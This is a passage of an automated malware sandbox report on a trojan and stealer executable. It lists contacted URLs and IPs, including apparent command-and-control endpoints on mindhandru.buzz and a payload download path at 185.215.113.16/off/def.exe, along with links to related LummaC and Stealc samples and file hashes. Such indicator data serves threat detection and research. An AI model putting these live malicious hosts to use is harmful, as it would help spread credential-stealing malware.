https://mindhandru.buzz/$	rwFNJ4pHWG.exe, 00000000.00000003.1665949053.0000000001287000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1665902655.000000000127D000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1530418764.000000000128C000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9	chromecache_112.6.dr	false		high
http://polymer.github.io/AUTHORS.txt	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml	chromecache_78.6.dr	false		high
https://mindhandru.buzz:443/api	rwFNJ4pHWG.exe, 00000000.00000003.1530418764.000000000128C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://mindhandru.buzz/M8	rwFNJ4pHWG.exe, 00000000.00000003.1488527946.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490654370.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489640265.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462684340.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489290466.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489828447.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489114394.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488662686.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490108199.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488631994.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1491188125.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488564484.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489465964.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1464080388.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1462409131.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490425816.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://management.azure.com/subscriptions?api-version=2016-06-01	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md	chromecache_78.6.dr	false		high
http://x1.c.lencr.org/0	rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pshelpmechoose	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://aka.ms/feedback/report?space=61	chromecache_78.6.dr	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://learn-video.azurefd.net/vod/player	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://twitter.com/intent/tweet?original_referer=$	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://github.com/gewarren	chromecache_78.6.dr	false		high
https://support.mozilla.org/products/firefoxgro.all	rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md	chromecache_78.6.dr	false		high
http://185.215.113.16/off/def.exeeWebKit/537.36	rwFNJ4pHWG.exe, 00000000.00000002.1731395088.00000000010FA000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725	chromecache_78.6.dr	false		high
https://client-api.arkoselabs.com/v2/api.js	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Thraka	chromecache_78.6.dr	false		high
http://polymer.github.io/PATENTS.txt	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://mindhandru.buzz/apib	rwFNJ4pHWG.exe, 00000000.00000003.1438729714.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1438825960.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/certhelp	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://mindhandru.buzz/	rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	rwFNJ4pHWG.exe, 00000000.00000003.1411535365.0000000005AFD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mairaw	chromecache_78.6.dr	false		high
https://mindhandru.buzz/1j8	rwFNJ4pHWG.exe, 00000000.00000003.1488527946.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490654370.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489640265.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489290466.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489828447.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489114394.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488662686.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490108199.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488631994.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1491188125.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1488564484.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1489465964.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1490425816.0000000005AC2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js	chromecache_78.6.dr	false		high
https://schema.org	chromecache_112.6.dr	false		high
http://polymer.github.io/LICENSE.txt	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://www.ecosia.org/newtab/	rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	rwFNJ4pHWG.exe, 00000000.00000003.1464121497.0000000005BD6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mindhandru.buzz//KqK	rwFNJ4pHWG.exe, 00000000.00000003.1438729714.0000000005AB9000.00000004.00000800.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1438825960.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/yourcaliforniaprivacychoices	chromecache_78.6.dr	false		high
https://ac.ecosia.org/autocomplete?q=	rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/nschonni	chromecache_78.6.dr	false		high
http://185.215.113.16/	rwFNJ4pHWG.exe, 00000000.00000003.1655093897.0000000001279000.00000004.00000020.00020000.00000000.sdmp	false		high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://github.com/adegeo	chromecache_78.6.dr	false		high
http://185.215.113.16/off/def.exezen	rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.000000000123F000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/jonschlinkert/is-plain-object	chromecache_92.6.dr, chromecache_112.6.dr	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	rwFNJ4pHWG.exe, 00000000.00000003.1462939932.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://octokit.github.io/rest.js/#throttling	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://github.com/js-cookie/js-cookie	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://mindhandru.buzz/cAEyLoeGMXY4h2NuERROx;	rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/off/def.exe	rwFNJ4pHWG.exe, 00000000.00000003.1655501714.0000000001267000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000002.1731552437.000000000123F000.00000004.00000020.00020000.00000000.sdmp, rwFNJ4pHWG.exe, 00000000.00000003.1655632997.0000000001269000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schema.org/Organization	chromecache_78.6.dr	false		high
https://channel9.msdn.com/	chromecache_92.6.dr, chromecache_112.6.dr	false		high
https://mindhandru.buzz/apiAVOh	rwFNJ4pHWG.exe, 00000000.00000003.1491004572.000000000126E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	rwFNJ4pHWG.exe, 00000000.00000003.1411399139.0000000005B00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/dotnet/try	chromecache_92.6.dr, chromecache_112.6.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.165.185	mindhandru.buzz	United States	13335	CLOUDFLARENETUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.7

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580870
Start date and time:	2024-12-26 12:40:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rwFNJ4pHWG.exe renamed because original name is a hash value
Original Sample Name:	87e3d63f63a76cf5d2567f56880a719b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/64@9/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.32.238.144, 172.217.19.227, 23.218.210.69, 142.250.181.142, 173.194.220.84, 184.30.22.94, 172.217.17.46, 52.182.143.215, 142.250.181.10, 172.217.19.170, 142.250.181.74, 172.217.19.202, 142.250.181.138, 216.58.208.234, 172.217.17.74, 142.250.181.42, 172.217.17.42, 172.217.21.42, 142.250.181.106, 172.217.19.234, 23.32.238.130, 2.19.198.56, 52.182.143.208, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.217.17.35, 13.107.246.63, 52.149.20.212, 23.218.208.109
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, otelrules.afd.azureedge.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, time.windows.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, onedscolprdcus04.centralus.cloudapp.azure.com, onedscolprdcus22.centralus.cloudapp.azure.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net,
Execution Graph export aborted for target rwFNJ4pHWG.exe, PID 7704 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:41:22	API Interceptor	44x Sleep call for process: rwFNJ4pHWG.exe modified

LLM Input / Output

Input	Output
URL: https://microsoft.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": true, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://microsoft.com
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "Yes", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This application could not be started", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.165.185	dEugughckk.exe	Get hash	malicious	LummaC	Browse
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse
	https://click.jipolismall.de/i86/	Get hash	malicious	Unknown	Browse
	https://ser.optimalesi.de/i87/	Get hash	malicious	Unknown	Browse
	https://ser.optimalesi.de/i68	Get hash	malicious	Unknown	Browse
	https://cpanel.vivatell.de/i105/	Get hash	malicious	Unknown	Browse
	https://cpanel.vivatell.de/i105/	Get hash	malicious	Unknown	Browse
	https://out.novastellz.de/i45/	Get hash	malicious	Unknown	Browse
185.215.113.16	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.16/Jo89Ku7d/index.php
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	FBVmDbz2nb.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16/steam/random.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0035.t-0009.t-msedge.net	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	13.107.246.63
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.63
	blq.exe	Get hash	malicious	Gh0stCringe, RunningRAT, XRed	Browse	13.107.246.63
	https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	13.107.246.63
	aYf5ibGObB.exe	Get hash	malicious	RedLine	Browse	13.107.246.63
	https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	Audio02837498.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	13.107.246.63
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	13.107.246.63
mindhandru.buzz	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
mindhandru.buzz	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	104.21.80.215
	RIMz2N1u5y.exe	Get hash	malicious	LummaC	Browse	172.67.154.166
	HVlonDQpuI.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	104.21.42.145
	MPySEh8HaF.exe	Get hash	malicious	LummaC	Browse	172.67.180.113
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
WHOLESALECONNECTIONSNL	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	185.215.113.206
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.206
	BVGvbpplT8.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	FBVmDbz2nb.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	BootStrapper.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Script.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	1C6ljtnwXP.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	RIMz2N1u5y.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	5RRVBiCpFI.exe	Get hash	malicious	LummaC	Browse	172.67.165.185

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	downloaded
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 101

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	dropped
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 102

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
